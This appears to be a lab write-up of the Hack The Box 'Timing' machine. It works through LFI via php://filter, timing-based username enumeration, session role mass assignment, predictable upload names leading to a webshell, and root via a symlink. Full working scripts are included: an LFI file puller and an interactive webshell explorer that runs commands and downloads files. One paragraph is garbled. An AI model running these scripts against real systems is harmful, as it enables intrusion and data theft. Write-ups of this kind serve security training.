> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box/htb-timing.md).

# HTB - Timing

## Enumeration and Foothold

### NMAP

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F82JWUZu4mfVg6PiGCwbz%2Fimage.png?alt=media&amp;token=635e6ace-9b6b-4894-88af-ca9315ff83ff" alt=""><figcaption></figcaption></figure>

There is forgot password link too but nothing happens clicking it.

Directory enumeration revealed interesting directories.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FGZAKP5s912xemZUGHew5%2Fimage.png?alt=media&amp;token=0bf432e4-80c7-4d02-ac9f-94ed3adb1b9b" alt=""><figcaption></figcaption></figure>

There is an image.php.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FsPan4odGXeHrNMhZJwO3%2Fimage.png?alt=media&amp;token=84136039-2273-4795-b2e5-d029625cab57" alt=""><figcaption></figcaption></figure>

Returns nothing what if there is a hidden parameter that it expects

#### Fuzzing Hidden Parameters

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FV3OUcdyOckR4WPGdLdWX%2Fimage.png?alt=media&amp;token=6d1ffd21-6032-4783-90fd-3d1d4202a4f1" alt=""><figcaption></figcaption></figure>

Did not find any parameters.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FwR8ahQF5mHIRY8yrqDbP%2Fimage.png?alt=media&amp;token=082dd5ce-644f-4328-b9fb-ebce5d479e95" alt=""><figcaption></figcaption></figure>

Looking at the source code there is a link to images directory what if the parameter loads this directory.

```bash
┌──(ajay㉿kali)-[~]
└─$ ffuf -u "http://10.129.61.57/image.php?FUZZ=images/user-icon.png"  -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fs 0 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.61.57/image.php?FUZZ=images/user-icon.png
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 0
________________________________________________

img                     [Status: 200, Size: 38616, Words: 277, Lines: 214, Duration: 44ms]
:: Progress: [6453/6453] :: Job [1/1] :: 943 req/sec :: Duration: [0:00:11] :: Errors: 0 ::

```

There is a parameter.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F0oSDFg3RRyWQGhwT2OVe%2Fimage.png?alt=media&amp;token=097c2ac8-bfc7-4341-a3fd-6e7b3b2bc59c" alt=""><figcaption></figcaption></figure>

The parameter is directly referencing local file a possible chance of LFI

### Local File Inclusion

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FBsTuDMmJYzXKbHpguoOb%2Fimage.png?alt=media&amp;token=19994b17-6fc8-4893-98dc-e78686cc8d1c" alt=""><figcaption></figcaption></figure>

need to bypass the filter.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FaISAmSZOitKhoArlzjft%2Fimage.png?alt=media&amp;token=675556cf-52ca-484e-9b3d-44b956347f62" alt=""><figcaption></figcaption></figure>

slashes in any form (`/`, `%2F`, and doubled `//`) are all being stripped or blocked.

But the wrappers work.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FNM7dapObX6xRYQ9kfeTS%2Fimage.png?alt=media&amp;token=00e9cea4-7c9b-49a1-953c-235958748498" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FAll8knBmYgVnlkyrpnh3%2Fimage.png?alt=media&amp;token=9ebaca3c-af63-4a69-a031-f45084b6980a" alt=""><figcaption></figcaption></figure>

#### Custom script to use LFI and decode

```bash
#!/bin/bash
#
# lfi_pull.sh - Pull and decode a file via image.php php://filter LFI
#
# Usage:
#   ./lfi_pull.sh <file>
#   ./lfi_pull.sh /etc/passwd
#   ./lfi_pull.sh config.php
#   ./lfi_pull.sh ../../../etc/hostname
#
# Optional overrides via env vars:
#   TARGET   - base URL (default: http://10.129.61.57)
#   COOKIE   - session cookie (default: none)

set -euo pipefail

TARGET="${TARGET:-http://10.129.61.57}"
COOKIE="${COOKIE:-}"

if [ $# -lt 1 ]; then
    echo "Usage: $0 <file-to-pull>"
    echo "Example: $0 /etc/passwd"
    exit 1
fi

FILE="$1"

CURL_ARGS=(-s -G)
if [ -n "$COOKIE" ]; then
    CURL_ARGS+=(-H "Cookie: $COOKIE")
fi

# URL-encode the resource value so special chars in the path don't break the request
ENCODED_FILE=$(python3 -c "import urllib.parse,sys; print(urllib.parse.quote(sys.argv[1], safe=''))" "$FILE")

URL="${TARGET}/image.php?img=php://filter/convert.base64-encode/resource=${ENCODED_FILE}"

echo "[*] Requesting: $URL" >&2

RESPONSE=$(curl "${CURL_ARGS[@]}" "$URL")

if echo "$RESPONSE" | grep -qi "Hacking attempt detected"; then
    echo "[!] Request was blocked by the filter." >&2
    exit 2
fi

if [ -z "$RESPONSE" ]; then
    echo "[!] Empty response - file may not exist or path is wrong." >&2
    exit 3
fi

DECODED=$(echo "$RESPONSE" | base64 -d 2>/dev/null) || {
    echo "[!] Failed to base64-decode response. Raw output was:" >&2
    echo "$RESPONSE" >&2
    exit 4
}

echo "$DECODED"

```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FFpLlJbNBpwDvbU3ZGNxJ%2Fimage.png?alt=media&amp;token=dc0fb868-3bf3-4761-92be-5b21102ef100" alt=""><figcaption></figcaption></figure>

```bash
─(ajay㉿kali)-[~]
└─$ ./lfipull.sh login.php  
[*] Requesting: http://10.129.61.57/image.php?img=php://filter/convert.base64-encode/resource=login.php
<?php

include "header.php";

function createTimeChannel()
{
    sleep(1);
}

include "db_conn.php";

if (isset($_SESSION['userid'])){
    header('Location: ./index.php');
    die();
}


if (isset($_GET['login'])) {
    $username = $_POST['user'];
    $password = $_POST['password'];

    $statement = $pdo->prepare("SELECT * FROM users WHERE username = :username");
    $result = $statement->execute(array('username' => $username));
    $user = $statement->fetch();

    if ($user !== false) {
        createTimeChannel();
        if (password_verify($password, $user['password'])) {
            $_SESSION['userid'] = $user['id'];
            $_SESSION['role'] = $user['role'];
            header('Location: ./index.php');
            return;
        }
    }
    $errorMessage = "Invalid username or password entered";


}
?>
<?php
if (isset($errorMessage)) {

    ?>
    <div class="container-fluid">
        <div class="row">
            <div class="col-md-10 col-md-offset-1">
                <div class="alert alert-danger alert-dismissible fade in text-center" role="alert"><strong>

                        <?php echo $errorMessage; ?>

                </div>
            </div>
        </div>
    </div>
    <?php
}
?>
    <link rel="stylesheet" href="./css/login.css">

    <div class="wrapper fadeInDown">
        <div id="formContent">
            <div class="fadeIn first" style="padding: 20px">
                <img src="./images/user-icon.png" width="100" height="100"/>
            </div>

            <form action="?login=true" method="POST">

                <input type="text" id="login" class="fadeIn second" name="user" placeholder="login">

                <input type="text" id="password" class="fadeIn third" name="password" placeholder="password">

                <input type="submit" class="fadeIn fourth" value="Log In">

            </form>


            <!-- todo -->
            <div id="formFooter">
                <a class="underlineHover" href="#">Forgot Password?</a>
            </div>

        </div>
    </div>


<?php
include "footer.php";

```

The login.php refers to `db_conn.php`, index.php&#x20;

`createTimeChannel()` calls `sleep(1)` only when a matching username is found in the DB (`$user !== false`), before checking the password.

```bash
┌──(ajay㉿kali)-[~]
└─$ ./lfipull.sh db_conn.php
[*] Requesting: http://10.129.61.57/image.php?img=php://filter/convert.base64-encode/resource=db_conn.php
<?php
$pdo = new PDO('mysql:host=localhost;dbname=app', 'root', '4_V3Ry_l0000n9_p422w0rd');
```

Found a password.

That said i can enumerate valid users through the timing constraint set as i have a users list extracted from the /etc/passwd.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F0mnjGsH5DUJInzGyrvhs%2Fimage.png?alt=media&amp;token=fbc67454-f685-4df5-bd17-ee1ff12ca8b8" alt=""><figcaption></figcaption></figure>

```bash
┌──(ajay㉿kali)-[~]
└─$ while read -r username; do
  t=$(curl -s -o /dev/null -w "%{time_total}" \
    -X POST \
    -d "user=${username}&password=wrongpass123" \
    -H "Content-Type: application/x-www-form-urlencoded" \
    -H "Cookie: PHPSESSID=plstf0hs8ssb59437vs7v7hprh" \
    "http://10.129.61.57/login.php?login=true")
  echo "$t  $username"
done < users.txt | sort -rn
1.174014  aaron
0.102261  list
0.100617  www-data
0.098926  mail
0.096972  gnats
0.096311  uuidd
0.095533  sshd
0.095529  lxd
0.095315  irc
0.095299  mysql
0.095276  news
0.094545  lp
0.094136  _apt
0.093580  dnsmasq
0.093509  systemd-resolve
0.092769  root
0.092222  backup
0.091529  man
0.091130  pollinate
0.090876  landscape
0.090821  nobody
0.090764  daemon
0.090758  bin
0.090579  sync
0.090531  games
0.090518  messagebus
0.090385  proxy
0.090323  sys
0.088895  syslog
0.088584  uucp
0.086706  systemd-network

```

Username aaron is valid.

i already have a credential from the db file but it is invalid.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F8qqfaeo0LvFpKRcl2f1Y%2Fimage.png?alt=media&amp;token=9af9d797-7490-43b2-b5d7-920bd27b31cb" alt=""><figcaption></figcaption></figure>

But trying username as password works.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FEseJ215yCmxrfEH2DT64%2Fimage.png?alt=media&amp;token=3ad258e4-f1fd-4a3a-afba-a078f0a93b53" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FpcTpVLIhHMA22A0vP5VQ%2Fimage.png?alt=media&amp;token=402e2b5f-3920-418a-84d8-8797322beb30" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FBCLe5GNTT5BYdDbUQat5%2Fimage.png?alt=media&amp;token=410c5882-a311-44b0-81f2-3dc986a3a626" alt=""><figcaption></figcaption></figure>

i can use the lfi script to grab the source to see actually what is happening here.

```bash
$role = $user['role'];
if (isset($_POST['role'])) {
    $role = $_POST['role'];
    $_SESSION['role'] = $role;   // <-- sets session role from user input
}
// dont persist role
$sql = "UPDATE users SET firstName='$firstName', ... WHERE id=$id";  // role NOT in UPDATE
```

The comment `// dont persist role` is telling on itself — the dev *tried* to prevent role escalation by leaving `role` out of the SQL `UPDATE` statement (so the DB value doesn't change). But they still let the **session** get overwritten directly from \`POST\[′role′]‘before that check.So even though the database still says you′re a regular user,you r live session(‘\_POST\['role']\` before that check. So even though the database still says you're a regular user, your live session (\` P​OST\[′role′]‘ before that check.So  even though the database still says you′re a regular user,your live session(‘\_SESSION\['role']\`) becomes whatever you send  likely `admin`.

so i can likely change the role of aaron using Mass Assignment

### Mass Assignment

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fek5wbsc9vVMSEMyHEjfW%2Fimage.png?alt=media&amp;token=f3fcfbd8-18b8-48b9-850e-3268ce6a3d49" alt=""><figcaption></figcaption></figure>

the role got admitted.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FEsKNCd14TGMLzMrfd6HL%2Fimage.png?alt=media&amp;token=a07fe722-6641-4d52-8b76-32b359672d66" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fkj6gvSWeynIvmi0qPbHX%2Fimage.png?alt=media&amp;token=2a9fe5aa-074f-441f-9665-5e4e4ea2a587" alt=""><figcaption></figcaption></figure>

i can upload a file.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fv7iU1JF44boMNtrpPUD8%2Fimage.png?alt=media&amp;token=9c239d12-2c75-4e58-9703-fe320838be6f" alt=""><figcaption></figcaption></figure>

only images are allowed so i will create an image file with php web shell

### File Upload RCE via Image&#x20;

I can pull upload.php to see whats actually happening.

```bash
──(ajay㉿kali)-[~]
└─$ ./lfipull.sh upload.php
[*] Requesting: http://10.129.61.57/image.php?img=php://filter/convert.base64-encode/resource=upload.php
<?php
include("admin_auth_check.php");

$upload_dir = "images/uploads/";

if (!file_exists($upload_dir)) {
    mkdir($upload_dir, 0777, true);
}

$file_hash = uniqid();

$file_name = md5('$file_hash' . time()) . '_' . basename($_FILES["fileToUpload"]["name"]);
$target_file = $upload_dir . $file_name;
$error = "";
$imageFileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));

if (isset($_POST["submit"])) {
    $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
    if ($check === false) {
        $error = "Invalid file";
    }
}

// Check if file already exists
if (file_exists($target_file)) {
    $error = "Sorry, file already exists.";
}

if ($imageFileType != "jpg") {
    $error = "This extension is not allowed.";
}

if (empty($error)) {
    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
        echo "The file has been uploaded.";
    } else {
        echo "Error: There was an error uploading your file.";
    }
} else {
    echo "Error: " . $error;
}
?>

```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FMpjBkrVFMYqPkfftGh6y%2Fimage.png?alt=media&amp;token=9e3383f5-7143-4d29-a315-f7737035aaec" alt=""><figcaption></figcaption></figure>

Note that odd bug in the source: `md5('$file_hash' . time())` — the `$file_hash` is inside **single quotes**, so PHP does NOT interpolate the variable. It's literally hashing the string `$file_hash` concatenated with the current Unix timestamp, not the actual `uniqid()` value. That means the filename prefix is just `md5("$file_hash" . time())` where `time()` is predictable (current server time, which you can get from the `Date:` response header).

The Response time is Wed, 12 Aug 2026 02:50:30 GMT&#x20;

convert to epoch time&#x20;

```bash
┌──(ajay㉿kali)-[~]
└─$ date -d "Wed, 12 Aug 2026 02:50:30 GMT" +%s
1786503030
```

use php to calculate the hash.

```bash
┌──(ajay㉿kali)-[~]
└─$ php -a                   
Interactive shell

php > echo md5('$file_hash' . "1786503030") . '_shell.jpg';
5785c882378b7d4e0bf9fc1fe2b452a3_shell.jpg
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FYwo8bLW6mCZFkow7CwUQ%2Fimage.png?alt=media&amp;token=25d9af61-214b-4578-85bd-a68f66c5c537" alt=""><figcaption></figcaption></figure>

Says error but requesting it through curl works.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fw8Jor4v2yyxn1ivD4V2k%2Fimage.png?alt=media&amp;token=60f9a7a0-3ddb-4ebb-8832-1294f35708f6" alt=""><figcaption></figcaption></figure>

trying every payload doesn’t work to get reverse shell

that said i am gonna build a custom file using claude to enumerate the filesystem and download files if there are of any interest.

#### Custom bash script for enumerating file system when RCE dont work

```bash
#!/bin/bash
#
# webshell_explorer.sh - Interactive filesystem browser/downloader using the
# image.php LFI-include RCE (via the uploaded shell.jpg webshell).
#
# Usage:
#   ./webshell_explorer.sh
#
# Optional overrides via env vars:
#   TARGET      - base URL (default: http://10.129.61.57)
#   SHELL_PATH  - path to the uploaded webshell (default known hash)
#   COOKIE      - session cookie, if needed
#
# Commands inside the interactive prompt:
#   ls [path]         - list a directory (defaults to cwd on the target)
#   cd <path>          - change remembered remote directory
#   pwd                 - show current remote directory
#   cat <file>          - print a file's contents
#   run <cmd>           - run an arbitrary shell command on target
#   download <file>      - fetch file to ./loot/ on your machine
#   exit / quit          - leave

set -uo pipefail

TARGET="${TARGET:-http://10.129.61.57}"
SHELL_PATH="${SHELL_PATH:-images/uploads/5785c882378b7d4e0bf9fc1fe2b452a3_shell.jpg}"
COOKIE="${COOKIE:-}"
LOOT_DIR="./loot"

mkdir -p "$LOOT_DIR"

CURL_BASE=(-s -G "${TARGET}/image.php")
CURL_BASE+=(--data-urlencode "img=${SHELL_PATH}")
if [ -n "$COOKIE" ]; then
    CURL_BASE+=(-H "Cookie: $COOKIE")
fi

remote_cwd="/var/www/html"

run_cmd() {
    local cmd="$1"
    curl "${CURL_BASE[@]}" --data-urlencode "cmd=${cmd}"
}

echo "[*] Webshell explorer connected to ${TARGET}"
echo "[*] Using shell at: ${SHELL_PATH}"
echo "[*] Remote starting dir (assumed): ${remote_cwd}"
echo "[*] Type 'help' for commands."
echo

while true; do
    read -e -p "remote:${remote_cwd}\$ " -a input
    [ ${#input[@]} -eq 0 ] && continue

    action="${input[0]}"
    arg="${input[*]:1}"

    case "$action" in
        help)
            cat <<EOF
Commands:
  ls [path]        list a directory (default: current remembered dir)
  cd <path>        change remembered remote directory (does not verify existence)
  pwd              show current remembered remote directory
  cat <file>       print a file's contents (relative to cwd unless absolute)
  run <cmd>        run an arbitrary shell command on target
  download <file>  fetch a file into ./loot/ on your local machine
  exit / quit      leave
EOF
            ;;

        ls)
            target_path="${arg:-$remote_cwd}"
            run_cmd "ls -la '${target_path}'"
            echo
            ;;

        cd)
            if [ -z "$arg" ]; then
                echo "Usage: cd <path>"
            else
                if [[ "$arg" == /* ]]; then
                    remote_cwd="$arg"
                else
                    remote_cwd="${remote_cwd%/}/$arg"
                fi
                echo "[*] Remembered dir set to: $remote_cwd"
            fi
            ;;

        pwd)
            echo "$remote_cwd"
            ;;

        cat)
            if [ -z "$arg" ]; then
                echo "Usage: cat <file>"
            else
                file_path="$arg"
                [[ "$file_path" != /* ]] && file_path="${remote_cwd%/}/$file_path"
                run_cmd "cat '${file_path}'"
                echo
            fi
            ;;

        run)
            if [ -z "$arg" ]; then
                echo "Usage: run <command>"
            else
                run_cmd "$arg"
                echo
            fi
            ;;

        download)
            if [ -z "$arg" ]; then
                echo "Usage: download <file>"
            else
                file_path="$arg"
                [[ "$file_path" != /* ]] && file_path="${remote_cwd%/}/$file_path"
                local_name="$LOOT_DIR/$(basename "$file_path")"
                echo "[*] Downloading '$file_path' -> $local_name"

                # base64-encode on the target via the RCE, then decode locally.
                # This avoids issues with binary data / control chars over the cmd= channel.
                b64=$(run_cmd "base64 -w0 '${file_path}' 2>/dev/null")

                if [ -z "$b64" ]; then
                    echo "[!] No data returned - file may not exist or isn't readable."
                else
                    echo "$b64" | base64 -d > "$local_name" 2>/dev/null
                    if [ -s "$local_name" ]; then
                        echo "[+] Saved to $local_name ($(stat -c%s "$local_name") bytes)"
                    else
                        echo "[!] Decode failed or file empty. Raw output was:"
                        echo "$b64"
                        rm -f "$local_name"
                    fi
                fi
                echo
            fi
            ;;

        exit|quit)
            echo "Bye."
            break
            ;;

        *)
            echo "Unknown command: $action (type 'help')"
            ;;
    esac
done
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FP4Ho2ZVxXbXkhKjjJVjM%2Fimage.png?alt=media&amp;token=1c6b0f21-9b32-4a8a-a3be-a0fcfbc12682" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FO2BJKLyuTSksMTFSJUTm%2Fimage.png?alt=media&amp;token=1c8fd8a4-52f4-44ad-850d-1c1490583c14" alt=""><figcaption></figcaption></figure>

```
remote:/opt$ download source-files-backup.zip
[*] Downloading '/opt/source-files-backup.zip' -> ./loot/source-files-backup.zip
[+] Saved to ./loot/source-files-backup.zip (627851 bytes)
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FSFTEw96FY0u4nnjHMl5x%2Fimage.png?alt=media&amp;token=e8d3e37d-8f17-4804-a3a5-e89855d7d0a6" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fs9blUDj1DVQSlGImFEsu%2Fimage.png?alt=media&amp;token=c2d24312-8b5f-4752-aea4-0143ac4eb602" alt=""><figcaption></figcaption></figure>

There is a git directory.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FMNwzYBKV6VanCwMa9Sde%2Fimage.png?alt=media&amp;token=9c060048-8dbc-41e5-b020-4abc1147f12d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FPVKz8C4nn5z0jE8lZSnt%2Fimage.png?alt=media&amp;token=5483c848-4503-45fa-b653-62fb13702c29" alt=""><figcaption></figcaption></figure>

there is a update of password we can try suing those against aaron through ssh.

## Shell as Aaron

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F8tkNZqcWB9K5y7rkFIyU%2Fimage.png?alt=media&amp;token=934f0df5-e8d1-4d02-9bce-60655b3dfd83" alt=""><figcaption></figcaption></figure>

It works

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FwSsfMWJIjNk0B7jHWoGw%2Fimage.png?alt=media&amp;token=b7b84364-72f2-4996-bad9-f16c138e5e79" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FiGRuPtWu0Uej94fJPMls%2Fimage.png?alt=media&amp;token=a025cbe7-b94e-4657-94c5-e8bd1514fa2a" alt=""><figcaption></figcaption></figure>

### Privilege Escalation via netutils

```
aaron@timing:~$ cat /usr/bin/netutils
#! /bin/bash
java -jar /root/netutils.jar
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fgbwc7qYoVWt8CjMBjjKH%2Fimage.png?alt=media&amp;token=c518ff1c-d224-44a5-b757-7b3656ffaf9a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FgKL1gYF1iE0JOnH8Xvtr%2Fimage.png?alt=media&amp;token=36645fa3-e3e7-4cc0-9e7c-f7fcdbd611d8" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FWzzVCq0eupyYDOh33TF1%2Fimage.png?alt=media&amp;token=caf0e7a3-0b81-4407-909a-fc554562d519" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fe5hSGbT55BDSr51HRNRq%2Fimage.png?alt=media&amp;token=d7218b77-375a-4577-a981-0d428ae3b3b9" alt=""><figcaption></figcaption></figure>

File is downloaded to current directory

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLnRxMbqLEM2cVJDI0GCh%2Fimage.png?alt=media&amp;token=10c342b0-6368-4333-9929-2e8f02a0e619" alt=""><figcaption></figcaption></figure>

downloaded file is owned by root

that means if i i create  a symlink of a root ssh key file i can be able to write ssh keys to root ssh directory but creating symlink.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FIaqhpuoXUAH6fVDsOnYL%2Fimage.png?alt=media&amp;token=0b4a1591-8a77-479a-bbca-a9cce3e6019e" alt=""><figcaption></figcaption></figure>

create a symlink and download

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FsJjXRnwptfxJ9fljmErb%2Fimage.png?alt=media&amp;token=3277db06-2676-4ecf-8859-57248334a883" alt=""><figcaption></figcaption></figure>

## Shell as Root

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FoQD31PZqcIX5E7QQ3Wd8%2Fimage.png?alt=media&amp;token=01141c69-4b1f-46b7-a2d3-d16996ff4004" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FOQ5f4lkHcNrVVZacM8wF%2Fimage.png?alt=media&amp;token=6931cc25-724d-4efe-ab63-914186f7fde2" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box/htb-timing.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
